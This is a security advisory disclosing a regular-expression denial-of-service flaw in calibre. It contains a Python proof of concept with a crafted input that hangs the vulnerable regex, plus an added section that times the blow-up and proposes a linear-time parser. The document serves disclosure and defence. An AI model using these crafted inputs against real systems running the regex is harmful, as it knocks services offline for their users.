Coordinated Disclosure Timeline
- 2021-08-31: report sent to kovid@kovidgoyal.net
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed kovid@kovidgoyal.net to ask if there will be a new release of calibre and whether there will be an advisory.
- 2021-09-01: Reply from kovid@kovidgoyal.net: “calibre is released every two weeks, the next release will be on the 10th. And no I am not going to release my own advisory, it’s a DoS, there are rather a lot”
Summary
calibre contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
calibre
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability in regular expressions whose backtracking cost grows super-linearly (here exponentially) with the input: a crafted input string makes the matcher try an enormous number of ways to fail, so a single call can tie up a CPU core for an arbitrarily long time.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.
Vulnerability
The vulnerable regular expression is here.
To see that the regular expression is vulnerable, copy-paste it into a separate file as shown below:
- Run the code below with python3:

    import re

    # The vulnerable regular expression, unchanged.
    reg = r'(?mu)\!\[([^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*)\]\s*\((?P<path>[^\)]*)\)'

    # Crafted input: unclosed '[' followed by many '[Z]' groups, so the overall
    # match must fail and the engine backtracks through every way of matching them.
    txt = "u![[[[[[Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z]()"

    for x in re.finditer(reg, txt):
        print(x.group('path'))

The script prints nothing: the call into the regular expression engine does not return in any reasonable time, and the running time grows exponentially with the number of `[Z]` groups in the input.
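The following is an added example, not code from the advisory and not calibre's fix. It keeps the advisory's regular expression verbatim, rebuilds the proof-of-concept string with a configurable number of `[Z]` units so the blow-up can be timed at sizes that still finish, and places beside it a single-pass, bracket-counting parser that recognises the same `![alt](path)` shape in linear time. The function names (`regex_paths`, `parse_paths`, `pathological`) and the parser's unlimited nesting depth are assumptions of this example; the regex itself bounds nesting at seven levels.

```python
import re
import time

# The regular expression from the advisory, unchanged.
VULN_RE = re.compile(
    r'(?mu)\!\[([^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*)\]\s*\((?P<path>[^\)]*)\)'
)


def regex_paths(text):
    """Image paths as extracted by the vulnerable regex (the original behaviour)."""
    return [m.group('path') for m in VULN_RE.finditer(text)]


def parse_paths(text):
    """Linear-time replacement (added example, not calibre's fix).

    One left-to-right pass with a bracket depth counter: accept '![' + alt + ']'
    + optional whitespace + '(' + path + ')', where alt contains only balanced
    []-pairs and path contains no ')'.  Unlike the regex, nesting depth is not
    limited to seven levels (an assumption of this example).
    """
    paths = []
    i, n = 0, len(text)
    while i < n:
        start = text.find('![', i)
        if start < 0:
            break
        depth, j = 1, start + 2
        while j < n and depth > 0:      # scan the alt text, tracking bracket depth
            if text[j] == '[':
                depth += 1
            elif text[j] == ']':
                depth -= 1
            j += 1
        k = j                           # j is just past the ']' that closed the alt text
        while k < n and text[k].isspace():   # str.isspace() stands in for the regex's \s*
            k += 1
        close = text.find(')', k + 1) if k < n and text[k] == '(' else -1
        if depth != 0 or close < 0:
            i = start + 1               # no match at this '![': keep scanning, like finditer
            continue
        paths.append(text[k + 1:close])
        i = close + 1
    return paths


def pathological(n):
    """Constructed input in the spirit of the advisory's PoC: an unclosed '['
    followed by n '[Z]' units.  Each unit can be matched in two ways by the
    regex, so a failing match explores about 2**n paths."""
    return 'u![[[[[[Z]' + '[Z]' * n + '()'


def regex_seconds(n):
    """Wall-clock seconds the vulnerable regex needs to fail on pathological(n)."""
    t0 = time.perf_counter()
    regex_paths(pathological(n))
    return time.perf_counter() - t0


if __name__ == '__main__':
    for n in range(10, 17):
        print(f'n={n:2d}  regex {regex_seconds(n):.3f}s')   # roughly doubles per step
    print('linear parser on n=40:', parse_paths(pathological(40)))   # [] immediately
```

Both functions agree on well-formed input; the difference is only in how they fail. The regex fails by backtracking through every split of each `[Z]` between the two `[^\]\[]*` runs that surround the nested group, which is what the `regex_seconds` loop makes visible; the parser fails after one pass because the depth never returns to zero.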
Impact
This issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-112 in any communication regarding this issue.